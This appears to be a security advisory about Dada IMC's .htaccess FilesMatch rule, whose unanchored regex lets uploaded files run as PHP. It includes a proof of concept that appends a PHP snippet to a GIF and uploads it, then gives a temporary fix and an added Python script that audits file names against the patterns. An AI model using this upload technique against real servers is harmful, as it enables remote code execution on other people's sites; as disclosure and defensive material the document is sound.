The instructions for installing Dada into a shared environment list the<br>following .htaccess file:<br><br>(<a href="http://www.dadaimc.org/mod/documentation/display/4/index.php">http://www.dadaimc.org/mod/documentation/display/4/index.php</a>)<br><br><FilesMatch "(feature|editor|newswire|otherpress|admin|pbook|media|mod)"><br> ForceType application/x-httpd-php<br></FilesMatch><br><br>The problem is that the regular expression in FilesMatch allows any
<br>uploaded file with one of the words<br>feature|editor|newswire|otherpress|admin|pbook|media|mod anywhere in its name to be<br>executed as PHP code, provided it can be passed through the MIME filter.<br><br>Example:<br><br>:~$ wget -O feature.gif <a href="http://www.google.com/intl/en_ALL/images/logo.gif">http://www.google.com/intl/en_ALL/images/logo.gif</a><br>--14:14:11-- <a href="http://www.google.com/intl/en_ALL/images/logo.gif">http://www.google.com/intl/en_ALL/images/logo.gif</a><br> => `feature.gif'<br>Resolving www.google.com... 216.239.37.99, 216.239.37.104<br>Connecting to www.google.com|216.239.37.99|:80... connected.<br>HTTP request sent, awaiting response... 200 OK<br>Length: 8,558 (8.4K) [image/gif]<br>
100%[===============================================================================================================>]<br>8,558 --.--K/s<br><br>14:14:11 (200.27 KB/s) - `feature.gif' saved [8558/8558]<br><br>:~$ echo "<? phpinfo(); ?>" >>
feature.gif<br><br>Create a new article and upload feature.gif as a media file.<br><br>Right-click on the Google logo after submitting the article, click "Copy<br>image location", and paste it into a new window. Scroll down to see the phpinfo()
<br>output.<br><br><br>To fix, upgrade to software where the author has a clue about security.<br><br>Until you can manage that, a temporary fix would be to change the .htaccess file to read:<br><br><FilesMatch "(feature$|editor$|newswire$|otherpress$|admin$|pbook$|media$|mod$)"><br><br>or use the Location directive in httpd.conf instead.<br><br><a href="http://bugs.dadaimc.org/view.php?id=191">http://bugs.dadaimc.org/view.php?id=191</a>
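Added example (not part of the original report or of Dada's own code): a Python check that models FilesMatch as an unanchored search on a file's base name and compares the documented pattern, the temporary fix above, and a pattern anchored at both ends. The both-ends pattern and the sample file names are assumptions constructed for illustration.

```python
import os
import re
import sys

WORDS = "feature|editor|newswire|otherpress|admin|pbook|media|mod"
PATTERNS = {
    # From the page: the documented .htaccess pattern and the temporary fix.
    "original": re.compile("(" + WORDS + ")"),
    "temp_fix": re.compile(
        "(feature$|editor$|newswire$|otherpress$|admin$|pbook$|media$|mod$)"),
    # Assumption, not from the page: anchor both ends of the name.
    "anchored": re.compile("^(" + WORDS + ")$"),
}

# Constructed sample of script names and uploaded media names.
SAMPLE = ["feature", "admin", "feature.gif", "media_photo.jpg",
          "model.png", "myfeature", "logo.gif", "report.pdf"]


def forced_to_php(pattern, names):
    """Names that FilesMatch would hand to the PHP handler.

    FilesMatch tests its regex against the file's base name as an
    unanchored search, which re.search models for these patterns.
    """
    return [n for n in names if pattern.search(n)]


def audit(names):
    """Map each pattern label to the names it would force to PHP."""
    return {label: forced_to_php(p, names) for label, p in PATTERNS.items()}


def scan_tree(root, pattern):
    """Paths under root (e.g. the upload directory) the pattern matches."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        hits += [os.path.join(dirpath, n) for n in forced_to_php(pattern, files)]
    return sorted(hits)


if __name__ == "__main__":
    if len(sys.argv) > 1:  # audit a real upload tree against the live pattern
        print("\n".join(scan_tree(sys.argv[1], PATTERNS["original"])))
    else:
        for label, names in audit(SAMPLE).items():
            print(f"{label:9} {names}")
```

Run with the upload directory as its argument, every path it prints is a file the server would treat as PHP rather than serve as media. The temporary fix anchors only the end of the name, so a name such as myfeature still matches it.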